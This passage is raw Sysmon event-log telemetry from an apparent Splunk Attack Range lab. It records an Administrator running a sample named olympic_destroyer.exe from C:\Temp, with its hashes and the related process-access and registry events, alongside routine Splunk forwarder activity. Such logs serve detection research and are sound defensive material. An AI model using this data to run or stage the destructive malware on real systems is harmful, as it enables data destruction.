10341000x8000000000000000289067Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:47.208{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289066Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:47.208{C8EA50B7-F2AA-6215-B100-000000003802}22443360C:\Windows\system32\csrss.exe{C8EA50B7-11FF-6216-2A05-000000003802}6332C:\Temp\olympic_destroyer.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000289065Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:47.208{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289064Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:47.208{C8EA50B7-F2AD-6215-C000-000000003802}48566280C:\Windows\Explorer.EXE{C8EA50B7-11FF-6216-2A05-000000003802}6332C:\Temp\olympic_destroyer.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+a90ff|C:\Windows\System32\windows.storage.dll+a8d75|C:\Windows\System32\windows.storage.dll+a8866|C:\Windows\System32\windows.storage.dll+a9cd8|C:\Windows\System32\windows.storage.dll+a868e|C:\Windows\System32\windows.storage.dll+ab4a5|C:\Windows\System32\windows.storage.dll+ab824|C:\Windows\System32\windows.storage.dll+aae60|C:\Windows\System32\windows.storage.dll+ad68a|C:\Windows\System32\windows.storage.dll+ad442|C:\Windows\System32\SHELL32.dll+3fa6d|C:\Windows\System32\SHELL32.dll+3e606|C:\Windows\System32\SHELL32.dll+80381|C:\Windows\System32\SHELL32.dll+6731e|C:\Windows\System32\SHELL32.dll+18cf1c|C:\Windows\System32\SHELL32.dll+18cc73|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000289063Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:47.199{C8EA50B7-11FF-6216-2A05-000000003802}6332C:\Temp\olympic_destroyer.exe-----"C:\Temp\olympic_destroyer.exe" C:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=68970B2CD5430C812BEF5B87C1ADD6EA,SHA256=E4E1E3C44E01C60FD433C6283BD8CD15A9941E1CBAAD72E6409CC92E2E91263E,IMPHASH=DA1C2D7ACFE54DF797BFB1F470257BC3{C8EA50B7-F2AD-6215-C000-000000003802}4856C:\Windows\explorer.exeC:\Windows\Explorer.EXE /NOUACCHECK 354300x8000000000000000289062Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:44.441{C8EA50B7-F118-6215-0100-000000003802}4SystemNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local53505-truefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local445microsoft-ds 354300x8000000000000000289061Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:44.441{C8EA50B7-F118-6215-0100-000000003802}4SystemNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local53505-truefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local445microsoft-ds 23542300x8000000000000000217007Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:48.940{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0D4CC856332DB007023A1009DF08097D,SHA256=0ECFB0E601D2C41BE6311949456F1B83DFDC37D01E23DECBB28BA3FE1758E91C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289076Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:48.458{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=604B65DCED51BF43E534FBBC05C06115,SHA256=CD676FD3DA101044B9E528E2E31CBCE00B04D56B494CF0F10E7095AEA77F9891,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217006Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:48.424{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=60F3431FBADC9903FCF373DC989C747C,SHA256=67BD9713C9194F5214758DC3E888F3DA266A3EEF642949CA8B611CFC1A5B25AB,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000289075Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:44.593{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53506-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000217022Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:49.971{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5CF7F878E830904A3C4CCB244BB264B9,SHA256=B0353988FE2E5132D4E417EFF12D252B64F6CC361254462498107BBEC14E4226,IMPHASH=00000000000000000000000000000000falsetrue 13241300x8000000000000000289085Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localInvDBSetValue2022-02-23 10:52:49.995{C8EA50B7-F11F-6215-1400-000000003802}1048C:\Windows\System32\svchost.exeHKU\S-1-5-21-1032146228-2128790581-2941542908-500\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Store\C:\Temp\olympic_destroyer.exeBinary Data 23542300x8000000000000000289084Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:49.480{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=23B6744F0B43CB8DC70047C3FC96BDB7,SHA256=9D9FD05149EAB96E79BFD5982AE2064A7DD42B9E202B30D5274DC31BC507F744,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000217021Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:49.659{4F8D34B0-1201-6216-6904-000000003902}2756864C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217020Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:49.409{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1201-6216-6904-000000003902}2756C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217019Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:49.409{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217018Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:49.409{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217017Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:49.409{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217016Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:49.409{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217015Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:49.409{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217014Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:49.409{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217013Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:49.409{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217012Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:49.409{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217011Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:49.409{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217010Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:49.409{4F8D34B0-F11B-6215-0500-000000003902}412428C:\Windows\system32\csrss.exe{4F8D34B0-1201-6216-6904-000000003902}2756C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000217009Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:49.409{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1201-6216-6904-000000003902}2756C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000217008Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:52:49.409{4F8D34B0-1201-6216-6904-000000003902}2756C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000289083Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:49.058{C8EA50B7-F2AD-6215-C000-000000003802}48561796C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+617df|C:\Windows\System32\SHELL32.dll+63325|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289082Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:49.058{C8EA50B7-F2AD-6215-C000-000000003802}48561796C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6323e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289081Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:49.058{C8EA50B7-F2AD-6215-C000-000000003802}48561796C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61a34|C:\Windows\System32\SHELL32.dll+63207|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289080Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:52:49.042{C8EA50B7-F2AD-6215-C000-000000003802}48565012C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+617df|C:\Windows\System32\SHELL32.dll+639b0|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289079Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 